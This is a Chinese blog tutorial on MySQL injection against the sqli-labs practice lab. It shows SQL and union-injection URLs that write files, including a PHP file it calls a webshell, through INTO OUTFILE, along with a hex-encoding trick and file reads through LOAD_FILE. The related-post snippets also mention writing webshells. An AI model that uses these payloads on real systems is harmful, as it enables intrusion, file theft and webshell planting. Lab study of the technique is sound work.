Mysql注入 -- 数据库导出及读文件

最新推荐文章于 2022-10-28 23:02:12 发布
最新推荐文章于 2022-10-28 23:02:12 发布
阅读量933 收藏 9
点赞数 3
分类专栏: MySQL注入 文章标签: 数据库导出 读文件 mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/116662210
版权

社会运行的规则和自己的不一样,不能我行我素,甚至有时还得违心讨好。。。

----  网易云热评   

一、数据库导出文件

1、连接数据库

2、通过into outfile导出数据库内容

select * from users into outfile "c:/1.sql";

3、通过into outfile语句,在C盘目录写入一句话木马

select '<?php phpinfo();?>' into outfile "c:/aiyou.php";

4、通过实例导出一句话,避免单引号问题,可以将一句话内容编码为十六进制

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,'<?php phpinfo();?>' into outfile 'c:/aiyou.php' --+http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'c:/aiyou.php' --+

提示:

导入文件需要修改mysql的一个参数值,打开my.cnf 或 my.ini,加入以下语句后重启mysql。

secure_file_priv=''

二、读文件

1、连接Mysql数据库,读取C盘的aiyou.php内容

select load_file("c:/aiyou.php");

2、通过联合查询,将读到的内容显示出来,为避免引号的问题,将路径编码为十六进制

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file("c:/1.sql");http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file(0x633a2f312e73716c) --+

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

web安全工具库
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
Mysql 数据库导入导出sql文件
qq_42805358的博客
01-04 960
mysql导入导出sql文件 数据库导入和导出最近经常用,整理一下 window下 1.导出整个数据库 mysqldump -u 用户名 -p 数据库名 &amp;amp;gt; 导出文件mysqldump -u dbuser -p dbname &amp;amp;gt; dbname.sql 2.导出一个表 mysqldump -u 用户名 -p 数据库名 表名&amp;amp;gt; 导出文件mysqldump -u dbus...
mysql数据库文件
qq_40334963的博客
02-26 4321
环境: centos7 mysql 5.6.47 用户:root@localhost 条件 mysql中涉及到写操作,必然离不开secure_file_priv参数,它的值限制load data,select … outfile,load_file()函数可作用的文件位置。 secure_file_priv: 值为NULL表示禁止限制操作 值为某一目录,则只能操作该目录下的文件 没有值则表示不对...
mysql 系统表_mysql数据库系统表
weixin_36217920的博客
01-27 4215
mysql一般在安装成功后,会在初始化时候创建几个库:information_schema、mysql、peformance_schema、sys、和test。(好像主要看版本,不过前面三个是一定会被创建的)对于information_schema和mysql这两个库,在我的原先一篇文章中介绍都已经挺齐全的了,这里就只做一下简要介绍里面的关键表。(后面三个库,感觉,没多大用处,就不介绍了)系统表的...
ATT&CK 红队实战4
m0_64118193的博客
10-28 632
Tomcat CVE-2017-12615 s2-045 RCE 远程代码执行漏洞 phpmyadmin CVE-2018-12613
mysql的几种获取shell和提权的方式
k851819815的博客
02-21 3494
mysql outfile导出webshell 条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法: show global variables like '%secure_file_priv%'; 这个参数只能通过修改配置文件后重启mysql修改。 1.select '<?php phpinfo();?>...
SQL注入之堆叠注入
Devil_ping的博客
02-10 900
堆叠注入又叫多语句注入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句 mysqli_query这个函数 只能执行一个sql语句 mysqli_multi_query这个函数 支持执行多个sql语句 例如select 1,2,3;select 4,5,6 ?id=1' ; select"<?php phpinfo();?>"into outfile"...
Mysql注入文件
m_de_g的博客
11-30 3419
1.Mysql注入文件 MySQL数据库在渗透测试过程中能够使用的功能还是比较多的,除了取数据之外,还可以进行对文件进行写(但前提是权限足够)。 取前提: 1.用户权限足够高,尽量具有root权限。 2.secure_file_priv不为NULL。 修改mysql.ini的配置 可以看到里面secure_file_priv =的配置语句,如果没有的看到配置文件的话,需要添加上 2.Mysql注入文件 3.写入Webshell 4.Sqlmap安全测试 ...
MySQL注入导出字段内容的研究通过注入导出WebShell
09-14
MySQL注入中,由于其语法特性与MSSQL不同,我们无法像在MSSQL中那样直接执行脚本并插入数据。MSSQL允许在查询语句中直接执行存储过程或者系统命令,而MySQL通常限制在执行SQL查询的范围内。然而,这并不意味着在...
MySQL-Front-v6.1.zip
11-19
它主要提供了一个直观的界面,使得数据库管理员和开发人员能够更方便地执行SQL查询、管理数据库对象(如表、视图、存储过程)、导入导出数据以及执行其他数据库管理任务,而无需直接通过命令行界面操作MySQL服务器。...
MySQL驱动 mysql-connector-net-6.4.1
11-26
6. **安全最佳实践**:遵循最佳安全实践,如定期更改密码、限制数据库用户权限、使用预编译的SQL语句防止SQL注入等。 MySQL Connector/NET 6.4.1作为一个稳定且功能丰富的驱动,为.NET开发者提供了强大而便捷的工具...
Node.js-模块查询MySQL数据库的简单Node
08-10
这样,你可以创建一个`database.js`文件导出连接和查询函数,然后在其他地方按需调用。 总结来说,通过Node.js的`mysql2`模块,我们可以方便地与MySQL数据库进行交互,实现数据的增删改查和事务处理。了解这些...
毕业设计:基于SSM的mysql-萌宠优购系统(源码 + 数据库
最新发布
06-11
数据库文件夹可能包含数据库脚本或数据库导出文件,用于创建和初始化"萌宠优购系统"所需的数据库结构,包括表定义、初始数据填充等。 【文档】文件夹可能包含项目报告、设计文档、用户手册等,帮助理解系统的...
MySQL注入
qq_45031509的博客
04-13 958
mysql注入 1.信息收集 1)操作系统:@@version_compile_cs(不同的系统对数据库操作语句的大小写区分) 2)数据库名:database() 3)数据库用户:user()(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。 4)数据库版本:version()(选择注入) 5)其他网站路径(进行文件取,为高权限取做准备) 2.数据注入 1)低版本(暴力或结合取查询,表名,列名用猜的方式) 2)高版本(information
MySQL导出数据select into outfile用法
Ceres的博客
07-28 2292
本文转载自:https://blog.csdn.net/caoxiaohong1005/article/details/72571798 1、select &amp;nbsp;into &amp;nbsp;outfield &amp;nbsp;功能: 导出数据到pc的指定目录下。 2、语法: SELECT ... INTO OUTFILE 'file_name' [CHARACTER SET...
[MYSQL]关于执行SELECT * INTO OUTFILE FROM TBL时报ERROR 1045 (28000): Access denied for user 'usr'@'%' 的问题。
kimsung的专栏
10-25 7706
好久没有来写博客了. 这几天活公司太多了. 再加上要准备考OCP了. 每天睡5小时的觉. 严重睡眠不足.  如题. 前几天, 在远程服务器(WAS)通过mysql的客户端连接到数据库, 刚开始连接都是正常. 但是只要执行 SELECT * INTO OUTFILE "/home/myusr/tmp/output.txt" FIELDS TERMINATED BY ','
MySQL 导出数据select into outfile用法
热门推荐
iCoding91
05-20 4万+
1、select  into  outfield  功能: 导出数据到pc的指定目录下。 2、语法: SELECT ... INTO OUTFILE 'file_name' [CHARACTER SET charset_name] [export_options] export_options: [{FIELDS | COLUMNS}
解决select ... into outfile '..' mysql文件权限问题
momon的专栏
11-19 1万+
select * from test into outfile '/home/user/test.txt' 在linux(centos)下 ,启动了mysql 并给用户文件写的权利 grant file on *.* to root@localhost; 在linux系统上,目录的权限全部是 rwxrwxrwx chmod 777 ... /home/user/test drwxrwxrwx
Mysql注入 -- 延时注入
weixin_41489908的博客
05-16 2812
生活不止眼前的苟且,还有房费、饭费、水电费。。。 ----网易云热评 一、常用函数 1、sleep(5):延时5秒 2、if(a,b,c):a为条件,正确返回b,否则返回c 二、实例测试 1、找到可以注入的payload,服务器反映5秒才有相应 http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+ 2、获取数据库长度,如果数据库名的长度等于8停留5秒 http://192.168.139.129/sqli/..
MySQL注入攻防指南:SQLi-Labs实战解析
"《Mysql注入---sqlilabs---lcamry MYSQL注入天书》是作者Lcamry创作的一份关于SQL注入的学习手册,主要针对SQLi-labs平台的挑战进行详细解析,涵盖了基础到高级的MySQL注入技术,包括盲注、导入导出操作、增删改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值